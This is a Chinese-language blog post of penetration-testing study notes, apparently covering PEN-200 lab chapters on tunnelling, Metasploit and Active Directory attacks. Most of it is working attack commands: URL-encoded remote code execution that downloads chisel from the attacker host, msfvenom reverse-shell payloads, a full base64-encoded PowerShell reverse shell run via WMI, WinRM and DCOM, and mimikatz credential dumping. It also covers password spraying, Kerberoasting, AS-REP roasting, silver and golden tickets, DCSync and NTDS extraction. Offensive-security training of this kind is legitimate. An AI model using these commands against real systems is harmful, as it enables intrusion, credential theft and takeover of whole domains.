linux跳板1上是使用web漏洞进行命令执行的,需要url编码

1
2
3
curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27wget%20192.168.118.4/chisel%20-O%20/tmp/chisel%20%26%26%20chmod%20%2Bx%20/tmp/chisel%27%29.start%28%29%22%29%7D/

curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27/tmp/chisel%20client%20192.168.118.4:8080%20R:socks%27%29.start%28%29%22%29%7D/

kali上查看,默认是1080端口开socks服务,安装ncat,ssh到10段通过本地的1080端口socks转发

1
2
3
ss -ntplu
sudo apt install ncat
ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' database_admin@10.4.50.215

19.2 DNS隧道

19.2.2 使用dnscat2搭建DNS隧道

kali(192)—……—跳板(任意和172)–目标(172)

前提是跳板发出的dns请求不管转发多少次,最终由kali上的服务端解析

在kali上启动dnscat2的服务端

1
dnscat2-server feline.corp

启动后会开启53端口监听

跳板上启动dnscat2客户端

1
./dnscat feline.corp

运行成功后会在服务端看到客户端连接成功,查看并配置客户端转发策略,就可以本地连接目标172主机

1
2
3
4
5
6
7
windows
window -i 1
?
listen --help
listen 127.0.0.1:4455 172.16.2.11:445

smbclient -p 4455 -L //127.0.0.1 -U hr_admin --password=Welcome1234

本篇对应教材第20章,主要内容”熟悉Metasploit框架”、”MSF载荷”、”使用MSF后渗透”和”自动化MSF”,记录使用工具和命令

20.1 熟悉Metasploit框架

20.1.1 MSF基本设置

数据库初始化

1
sudo msfdb init

如果想开机启动数据库可以

1
sudo systemctl enable postgresql

启动MSF并查看数据库状态

1
2
sudo msfconsole
db_status

帮助命令

1
help

查看并新建工作区

1
2
workspace
workspace -a pen200

nmap扫描并将结果存进数据库

1
2
db_nmap
db_nmap -A 192.168.50.202

在数据库里查看主机、服务、指定端口服务

1
2
3
hosts
services
services -p 8000

命令帮助信息查询

1
show -h

20.1.2 工具模块

查看

1
show auxiliary

搜索并使用,查看工具模块说明、参数等

1
2
3
4
search type:auxiliary smb
use 56
info
show options

设置参数,取消设置,从数据库中筛选设置,运行,查看结果

1
2
3
4
5
set RHOSTS 192.168.50.202
unset RHOSTS
services -p 445 --rhosts
run
vulns

ssh登录尝试工具搜索并使用,查看正确的账号密码

1
2
3
4
5
6
7
8
9
10
search type:auxiliary ssh
use 15
show options
set PASS_FILE /usr/share/wordlists/rockyou.txt
set USERNAME george
set RHOSTS 192.168.50.201
set RPORT 2222
run

creds

20.1.3 漏洞利用模块

创建工作区,搜索漏洞利用工具,查看并设置参数,设置payload及参数,运行

1
2
3
4
5
6
7
8
9
10
11
workspace -a exploits
search Apache 2.4.49
use 0
info
show options
set payload payload/linux/x64/shell_reverse_tcp
show options
set SSL false
set RPORT 80
set RHOSTS 192.168.50.16
run

成功后获得shell,使用Ctrl+z然后y将session置于后台,列举所有sessions,进入某个session,取消某个session

1
2
3
sessions -l
sessions -i 2
sessions -k 2

后台监听和持续监听

1
2
run -j
run -z

20.2 MSF载荷

20.2.1 分段与非分段载荷

查看载荷

1
show payloads

一般看有_的是非分段,有/是分段载荷,例如

1
2
shell_reverse_tcp 非分段
shell/reverse_tcp 分段

20.2.2 Meterpreter载荷

查看,使用,查看参数,在漏洞利用中使用

1
2
3
4
5
6
7
show payloads

payload/linux/x64/meterpreter_reverse_tcp

set payload 11
show options
run

获得权限,查看帮助

1
meterpreter > help

查看系统信息

1
2
sysinfo
getuid

获得shell,置于后台,查看所有shell信息,进入后台指定shell

1
2
3
4
5
shell

Ctrl+Z再按y可以把shell放在后台
channel -l
channel -i 1

查看本地路径,切换本地路径,下载文件,读取本地文件,上传文件,查看目标机器文件,退出

1
2
3
4
5
6
7
8
meterpreter > lpwd

lcd /home/kali/Downloads
download /etc/passwd
lcat /home/kali/Downloads/passwd
upload /usr/bin/unix-privesc-check /tmp/
ls /tmp
exit

20.2.3 可执行有效载荷

查看、生成(非分段)、下载、执行、获得shell

1
2
3
4
5
msfvenom -l payloads --platform windows --arch x64
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.2 LPORT=443 -f exe -o nonstaged.exe
iwr -uri http://192.168.119.2/nonstaged.exe -Outfile nonstaged.exe
.\nonstaged.exe
nc -nvlp 443

分段载荷需要在MSF的multi/handler下使用,否则nc监听拿到shell无法执行命令

生成,启动msf,使用multi/handler

1
2
3
4
5
6
7
8
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.119.2 LPORT=443 -f exe -o staged.exe

use multi/handler
set payload windows/x64/shell/reverse_tcp
show options
set LHOST 192.168.119.2
set LPORT 443
run

后台运行,查看job

1
2
run -j
jobs

20.3 使用MSF后渗透

20.3.1 核心后渗透功能

生成payload,上传,运行,获得shell

1
2
3
4
5
6
7
8
9
10
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.119.4 LPORT=443 -f exe -o met.exe
use multi/handler
set payload windows/x64/meterpreter_reverse_https
set LPORT 443
run

nc 192.168.50.223 4444
powershell
iwr -uri http://192.168.119.2/met.exe -Outfile met.exe
.\met.exe

后渗透功能:查看空闲时间、提权、进程迁移、隐藏窗口运行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
idletime

shell
whoami /priv
有SeImpersonatePrivilege
exit
getuid
getsystem
getuid


ps
migrate 8052
ps
getuid

execute -H -f notepad
migrate 2720

20.3.2 后渗透模块

bypass UAC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
getsystem
ps
migrate 8044
getuid
Server username: ITWK01\offsec

shell
powershell -ep bypass
Import-Module NtObjectManager
Get-NtTokenIntegrityLevel
Medium  说明有UAC

Ctrl+Z y后台运行shell
bg
search UAC
use exploit/windows/local/bypassuac_sdclt
show options
set SESSION 9
set LHOST 192.168.119.4
run

shell
powershell -ep bypass
Import-Module NtObjectManager
Get-NtTokenIntegrityLevel
High

mimikatz获取hash

1
2
3
4
5
6
use exploit/multi/handler
run
getsystem
load kiwi
help
creds_msv

20.3.3 设置路由和代理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
ipconfig
发现是双网卡192172

meterpreter > bg
[*] Backgrounding session 12...

route add 172.16.5.0/24 12
route print

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   172.16.5.0         255.255.255.0      Session 12

端口扫描
use auxiliary/scanner/portscan/tcp
set RHOSTS 172.16.5.200
set PORTS 445,3389
run

use exploit/windows/smb/psexec
set SMBUser luiza
set SMBPass "BoccieDearAeroMeow1!"
set RHOSTS 172.16.5.200
set payload windows/x64/meterpreter/bind_tcp
set LPORT 8000
run

自动设置路由

1
2
3
4
5
6
use multi/manage/autoroute
show options
sessions -l
set session 12
run
就可以自动添加192172理由

设置代理

1
2
3
4
5
6
7
use auxiliary/server/socks_proxy
show options
set SRVHOST 127.0.0.1
set VERSION 5
run -j

默认是1080端口

配置,使用

1
2
3
4
5
tail /etc/proxychains4.conf

socks5 127.0.0.1 1080

sudo proxychains xfreerdp /v:172.16.5.200 /u:luiza

端口转发

1
2
3
4
sessions -i 12
portfwd -h
portfwd add -l 3389 -p 3389 -r 172.16.5.200
sudo xfreerdp /v:127.0.0.1 /u:luiza

20.4 自动化MSF

20.4.1 资源脚本

创建脚本文件listener.rc

1
2
3
4
5
6
7
use exploit/multi/handler
set PAYLOAD windows/meterpreter_reverse_https
set LHOST 192.168.119.4
set LPORT 443
set AutoRunScript post/windows/manage/migrate 
set ExitOnSession false
run -z -j

加载脚本文件

1
sudo msfconsole -r listener.rc

运行payload

1
2
iwr -uri http://192.168.119.4/met.exe -Outfile met.exe
.\met.exe

获得shell并自动迁移到notepad进程,并后台运行

其他系统自带脚本

1
ls -l /usr/share/metasploit-framework/scripts/resource

本篇对应教材第21章,主要内容”AD域手动枚举”、”AD域手动枚举拓展”、”AD域自动枚举”,记录使用工具和命令

21.2 AD域手动枚举

21.2.1 Windows旧工具

枚举域用户,查询制定域用户,查询域组,查询组成员

1
2
3
4
5
xfreerdp /u:stephanie /d:corp.com /v:192.168.50.75
net user /domain
net user jeffadmin /domain
net group /domain
net group "Sales Department" /domain

21.2.2 使用powershell和.NET枚举

枚举当前域信息

1
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

编写脚本,并加载运行

enumeration.ps1

1
2
3
4
5
# Store the domain object in the $domainObj variable
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

# Print the variable
$domainObj
1
2
powershell -ep bypass
.\enumeration.ps1

查询DC域控

1
2
3
4
5
6
7
8
# Store the domain object in the $domainObj variable
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

# Store the PdcRoleOwner name to the $PDC variable
$PDC = $domainObj.PdcRoleOwner.Name

# Print the $PDC variable
$PDC

用adsi检索DN

1
([adsi]'').distinguishedName
1
2
3
4
5
6
7
8
9
10
11
# Store the domain object in the $domainObj variable
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

# Store the PdcRoleOwner name to the $PDC variable
$PDC = $domainObj.PdcRoleOwner.Name

# Store the Distinguished Name variable into the $DN variable
$DN = ([adsi]'').distinguishedName

# Print the $DN variable
$DN

LDAP枚举

1
2
3
4
$PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName 
$LDAP = "LDAP://$PDC/$DN"
$LDAP
1
2
PS C:\Users\stephanie> .\enumeration.ps1
LDAP://DC1.corp.com/DC=corp,DC=com

21.2.3 在脚本中增加搜索功能

使用DirectoryEntry和DirectorySearcher进行搜索

1
2
3
4
5
6
7
8
$PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName 
$LDAP = "LDAP://$PDC/$DN"

$direntry = New-Object System.DirectoryServices.DirectoryEntry($LDAP)

$dirsearcher = New-Object System.DirectoryServices.DirectorySearcher($direntry)
$dirsearcher.FindAll()

会得到很多信息,进一步检索主机用户信息

1
2
3
4
5
6
7
8
9
$PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName 
$LDAP = "LDAP://$PDC/$DN"

$direntry = New-Object System.DirectoryServices.DirectoryEntry($LDAP)

$dirsearcher = New-Object System.DirectoryServices.DirectorySearcher($direntry)
$dirsearcher.filter="samAccountType=805306368"
$dirsearcher.FindAll()

枚举每个属性

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = $domainObj.PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName 
$LDAP = "LDAP://$PDC/$DN"

$direntry = New-Object System.DirectoryServices.DirectoryEntry($LDAP)

$dirsearcher = New-Object System.DirectoryServices.DirectorySearcher($direntry)
$dirsearcher.filter="samAccountType=805306368"
$result = $dirsearcher.FindAll()

Foreach($obj in $result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop
    }

    Write-Host "-------------------------------"
}

查看某个用户(jeffadmin)所属的组

1
2
3
4
5
6
7
8
9
10
11
12
13
$dirsearcher = New-Object System.DirectoryServices.DirectorySearcher($direntry)
$dirsearcher.filter="name=jeffadmin"
$result = $dirsearcher.FindAll()

Foreach($obj in $result)
{
    Foreach($prop in $obj.Properties)
    {
        $prop.memberof
    }

    Write-Host "-------------------------------"
}

做成函数方便自定义参数进行搜索

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
function LDAPSearch {
    param (
        [string]$LDAPQuery
    )

    $PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
    $DistinguishedName = ([adsi]'').distinguishedName

    $DirectoryEntry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$PDC/$DistinguishedName")

    $DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher($DirectoryEntry, $LDAPQuery)

    return $DirectorySearcher.FindAll()

}

使用的时候,先导入

1
Import-Module .\function.ps1

搜索用户、组

1
2
LDAPSearch -LDAPQuery "(samAccountType=805306368)"
LDAPSearch -LDAPQuery "(objectclass=group)"

搜索组中的对象

1
foreach ($group in $(LDAPSearch -LDAPQuery "(objectCategory=group)")) {$group.properties | select {$_.cn}, {$_.member}}

搜索某个组里的成员

1
2
$sales = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Sales Department))"
$sales.properties.member

如有组嵌套可以继续使用上面方法搜索成员

21.2.4 使用PowerView枚举AD

导入

1
Import-Module .\PowerView.ps1

枚举域信息、域用户、域用户名、筛选域用户信息、组名、组下成员

1
2
3
4
5
6
Get-NetDomain
Get-NetUser
Get-NetUser | select cn
Get-NetUser | select cn,pwdlastset,lastlogon
Get-NetGroup | select cn
Get-NetGroup "Sales Department" | select member

21.3 AD域手动枚举-拓展

21.3.1 枚举操作系统

继续PowerView枚举,枚举域主机、筛选主机名和操作系统

1
2
Get-NetComputer
Get-NetComputer | select operatingsystem,dnshostname

21.3.2 获取已登录用户

查看当前用户能访问域内哪些主机

1
Find-LocalAdminAccess

使用当前用户访问域内主机获取信息

1
2
3
4
5
Get-NetSession -ComputerName files04 -Verbose
Get-NetSession -ComputerName web04 -Verbose

如果没有权限会显示
VERBOSE: [Get-NetSession] Error: Access is denied

如果可以访问

1
2
3
4
5
6
7
Get-NetSession -ComputerName client74

CName        : \\192.168.50.75
UserName     : stephanie
Time         : 8
IdleTime     : 0
ComputerName : client74

针对Windows11操作系统可能无法远程获取到上面信息,因为权限不够,可以查看低版本的操作系统

1
Get-NetComputer | select dnshostname,operatingsystem,operatingsystemversion

然后可以尝试使用其他工具进行连接枚举已登录用户,比如PsLoggedOn

1
2
3
4
5
6
7
8
9
.\PsLoggedon.exe \\files04
不成功
Unable to query resource logons
成功
Users logged on locally:
     <unknown time>             CORP\jeffadmin

Users logged on via resource shares:
     10/5/2022 1:33:32 AM       CORP\stephanie

21.3.3 通过SPN(服务主体名)枚举

列出某个账号的SPN,是向dc进行查询

1
setspn -L iis_service

也可以用PowerView枚举

1
Get-NetUser -SPN | select samaccountname,serviceprincipalname

针对结果中web服务查,看域名对用的ip

1
nslookup.exe web04.corp.com

21.3.4 枚举对象权限

枚举当前用户权限,使用PowerView

1
Get-ObjectAcl -Identity stephanie

在结果中针对SID标识转换成对象进行查看

1
2
Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104
Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-553

可以获得SecurityIdentifier对ObjectSID的权限ActiveDirectoryRights是ReadProperty

查看所有对”Management Department”组有GenericAll的权限

1
Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights

查看结果中所有sid信息

1
"S-1-5-21-1987370270-658905905-1781884369-512","S-1-5-21-1987370270-658905905-1781884369-1104","S-1-5-32-548","S-1-5-18","S-1-5-21-1987370270-658905905-1781884369-519" | Convert-SidToName

发现当前用户有权限,然后将自己加入到Management Department组

1
2
net group "Management Department" stephanie /add /domain
Get-NetGroup "Management Department" | select member

可以成功,再删除

1
2
net group "Management Department" stephanie /del /domain
Get-NetGroup "Management Department" | select member

21.3.5 枚举域共享

PowerView

1
Find-DomainShare

访问域共享,powershell下

1
2
3
ls \\dc1.corp.com\sysvol\corp.com\
ls \\dc1.corp.com\sysvol\corp.com\Policies\
cat \\dc1.corp.com\sysvol\corp.com\Policies\oldpolicy\old-policy-backup.xml

获得hash,在kali下可以破解

1
gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE"

查看其他共享获得敏感文件

1
2
3
ls \\FILES04\docshare
ls \\FILES04\docshare\docs\do-not-share
cat \\FILES04\docshare\docs\do-not-share\start-email.txt

邮件中有密码明文

21.4 自动枚举

21.4.1 SharpHound自动枚举

导入、帮助

1
2
Import-Module .\Sharphound.ps1
Get-Help Invoke-BloodHound

获取域信息

1
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\stephanie\Desktop\ -OutputPrefix "corp audit"

生成zip包文件,下载进行分析

21.4.2 使用BloodHound进行分析

kali下开启数据库

1
2
3
4
sudo neo4j start

http://localhost:7474
neo4j/neo4j

登录后提示改密码

启动bloodhound

1
bloodhound

登录neo4j数据库后,在gui界面导入zip包,在界面”Database Info”可以查看域相关所有信息,在”Analysis”可以看到预设的分析策略,比如

1
2
3
Find all Domain Admins
Shortest Paths
查看最短路径

将获得到权限的用户和主机右键标记为”Mark User as Owned”,然后重新规划获得域控的最短路径

本篇对应教材第22章,主要内容”AD身份认证”、”AD身份认证攻击”,记录使用工具和命令

22.1 AD身份认证

22.1.1 NTLM认证

认证时使用ip地址,一共7个步骤

client — server — DC

1
2
3
4
5
6
7
client使用密码计算ntlm
client将username发送给server
server返回给client一个随机挑战串nonce
client使用ntlm加密nonce形成res发给server
server将res、username、nonce发给DC
DC上有所有用户的ntlm,使用对用username的ntlm解密res获得nonce,比对nonce是否正确
DC判断后将结果发给server

22.1.2 Kerberos认证

变换了认证模式

client — DC(KDC)

client — server

过程是client向DC请求票据,然后使用票据访问server。

22.1.3 缓存AD认证信息

hash一般存储在LSASS中,使用mimikatz来dump hash

1
2
3
4
5
6
xfreerdp /cert-ignore /u:jeff /d:corp.com /p:HenchmanPutridBonbon11 /v:192.168.50.75
cd C:\Tools
.\mimikatz.exe
privilege::debug
获取已登录的用户hash
sekurlsa::logonpasswords

滥用TGT和服务票证进行身份验证,获取自己和其他用户的票据

1
2
dir \\web04.corp.com\backup
sekurlsa::tickets

可以看到TGT和TGS

22.2 AD身份认证攻击

22.2.1 密码喷洒攻击

密码暴力破解会导致密码锁死,所以要先查看密码策略

1
net accounts

如果有密码锁定次数,如5次/30分钟,就只能测试4次/30分钟,不然就会被锁定

1)一般用密码喷洒(使用LDAP和ADSI)

1
2
3
4
5
6
7
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
New-Object System.DirectoryServices.DirectoryEntry($SearchString, "pete", "Nexus123!")

如果正确

1
2
distinguishedName : {DC=corp,DC=com}
Path              : LDAP://DC1.corp.com/DC=corp,DC=com

错误会显示”The user name or password is incorrect.”

也可以使用现成脚本https://web.archive.org/web/20220225190046/https://github.com/ZilentJack/Spray-Passwords/blob/master/Spray-Passwords.ps1

1
2
3
cd C:\Tools
powershell -ep bypass
.\Spray-Passwords.ps1 -Pass Nexus123! -Admin

2)利用SMB密码喷洒

1
2
3
4
crackmapexec smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success

crackmapexec smb 192.168.50.75 -u dave -p 'Flowers1' -d corp.com
显示"Pwn3d!"说明可以成功登录进行控制

3)基于TGT密码喷洒

1
.\kerbrute_windows_amd64.exe passwordspray -d corp.com .\usernames.txt "Nexus123!"

22.2.2 AS-REP烘焙

在kali下使用一个域账号及密码向DC请求AS-REQ,验证成功会返回AS-REPKey和TGT,就可以破解密码了。

1
2
impacket-GetNPUsers -dc-ip 192.168.50.70  -request -outputfile hashes.asreproast corp.com/pete
输入密码

破解

1
2
hashcat --help | grep -i "Kerberos"
sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Windows下可以使用Rubeus.exe,使用当前用户权限

1
2
cd C:\Tools
.\Rubeus.exe asreproast /nowrap

/nowrap去掉空格,复制下来破解

1
sudo hashcat -m 18200 hashes.asreproast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

枚举可以使用PowerView命令,或者kali上使用impacket-GetNPUsers

1
2
Get-DomainUser -PreauthNotRequired
impacket-GetNPUsers -dc-ip 192.168.50.70 corp.com/pete

22.2.3 Kerberoasting

在Windows上使用Rubeus,使用当前用户获取SPN然后请求DC获得TGS-REP

1
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

破解

1
2
hashcat --help | grep -i "Kerberos"
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

kali上使用impacket-GetUserSPNs,需要一个域账号和密码

1
sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete

一般获得的是SPN服务账号的hash,破解

1
sudo hashcat -m 13100 hashes.kerberoast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

22.2.4 白银票据

在指导SPN服务账号和hash的情况下,使用域SID和SPN,修改不具备权限的用户票据。

1
2
iwr -UseDefaultCredentials http://web04
拒绝访问

mimikatz进行获取域SID和SPN账号hash

1
2
3
4
5
6
7
8
9
privilege::debug
sekurlsa::logonpasswords

SID               : S-1-5-21-1987370270-658905905-1781884369-1109
        msv :
         [00000003] Primary
         * Username : iis_service
         * Domain   : CORP
         * NTLM     : 4d28cf5252d39971419580a51484ca09

这个SID也可以查看当前用户获得

1
whoami /user

域SID是去掉最后一段

用mimiaktz伪造票据

1
2
kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin
exit

查看票据,再访问,就可以成功访问了

1
2
klist
iwr -UseDefaultCredentials http://web04

22.2.5 DC同步(dcsync)

需要域管理员或者企业管理员具有同步权限的用户权限

Windows下使用mimikatz获得制定用户的hash

1
2
3
4
cd C:\Tools\
.\mimikatz.exe
lsadump::dcsync /user:corp\dave
lsadump::dcsync /user:corp\Administrator

破解

1
hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

kali上使用impacket-secretsdump

1
impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"BrouhahaTungPerorateBroom2023\!"@192.168.50.70

本篇对应教材第23章,主要内容”AD横向移动技术”、”AD持久化”,记录使用工具和命令

23.1 AD横向移动技术

23.1.1 WMI和WinRM

WMI:Windows管理接口(使用135端口和19152-65535之前的高端口),创建计算器进程

1
wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc"

使用powershell

1
2
3
4
5
6
7
8
$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options 
$command = 'calc';
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

要获得反弹shell,可以使用powershell反弹,先做编码

1
2
3
4
5
6
7
8
import sys
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.118.2",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)

注意编码utf16

1
2
python3 encode.py
获得powershell的反弹shell代码
1
2
3
4
5
6
7
8
9
$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
$Options = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options
$Command = 'powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5AD...
HUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA';
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

WinRM:远程主机管理(使用5986https和5985http)

1
2
3
4
winrs -r:files04 -u:jen -p:Nexus123!  "cmd /c hostname & whoami"

winrs -r:files04 -u:jen -p:Nexus123!  "powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5AD...
HUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"

powershell

1
2
3
4
5
6
7
8
9
10
11
$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
New-PSSession -ComputerName 192.168.50.73 -Credential $credential

成功返回
session ID 1

进入session可以执行命令
Enter-PSSession 1

23.1.2 PsExec

条件

1
2
3
用户是本地administrators组
开启ADMIN$
开启文件和打印共享
1
./PsExec64.exe -i  \\FILES04 -u corp\jen -p Nexus123! cmd

23.1.3 hash传递(pth)

条件

1
2
3
smb445端口可访问
开启ADMIN$
开启文件和打印共享
1
/usr/bin/impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.50.73

23.1.4 hash跨越

获得一台机器的用户(本地管理员system权限)后,有与管理员登录的话,使用mimikatz获得其他用户hash(域管理员),就可以使用hash跨越

1
2
privilege::debug
sekurlsa::logonpasswords

创建域管权限的进程

1
sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell

查看票据

1
2
3
4
5
6
7
klist
没有票据
net use \\files04
klist
有票据了
执行命令
.\PsExec.exe \\files04 cmd

23.1.5 票据传递

场景:当前用户没有权限访问某共享文件夹,使用mimikatz获得另一个具有权限的票据TGS,然后导入就可以访问了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
whoami
ls \\web04\backup
当前用户没权限访问

privilege::debug
sekurlsa::tickets /export
dir *.kirbi
找到另一个账号的票据注入到当前用户session
kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi

klist
查看已经有了dave的票据
ls \\web04\backup
可以访问了

23.1.6 DCOM(分布式组件对象模型)

使用135端口

powershell

1
2
3
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.50.73"))
$dcom.Document.ActiveView.ExecuteShellCommand("cmd",null,"/c calc","7")
tasklist | findstr "calc"

远程运行计算器,换成反弹shell

1
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",null,"powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACgAKIAMQA9A...AC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA","7")

23.2 AD持久化

23.2.1 黄金票据

使用krbtgt的hash伪造票据

1
2
3
4
5
6
7
PsExec64.exe \\DC1 cmd.exe
当前用户没有权限访问DC1

到DC1上获得krbtgt的hash
privilege::debug
lsadump::lsa /patch
获得域SID和krbtgt的hash

在任意机器上先删除错误票据,为指定用户创建黄金票据,开启指定用户的cmd

1
2
3
kerberos::purge
kerberos::golden /user:jen /domain:corp.com /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt
misc::cmd

然后访问DC1,需要使用主机名,使用IP会无法访问

1
2
3
PsExec.exe \\dc1 cmd.exe
whoami /groups
当前用户属于域管组了

23.2.2 Shadow副本

使用域管备份

1
2
3
vshadow.exe -nw -p  C:

- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2

拷贝文件到指定目录

1
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak

注册表获取system

1
reg.exe save hklm\system c:\system.bak

获得上面两个文件后可以获得所有用户hash

1
impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL

结束语

  • CTRl+D 将本网站:ycc77.com添加到书签栏哦~
  • 需要资源,记得将ycc77.cn 添加到书签栏哦~
  • QQ交流群:660264846(满)
  • QQ交流群2:721170435
  • B站: 疯狂的杨CC
  • 抖音: 疯狂的杨CC
  • 快手: 疯狂的杨CC
  • 公众号:SGY安全
  • 91: 疯狂的杨CC
  • p站: 疯狂的杨CC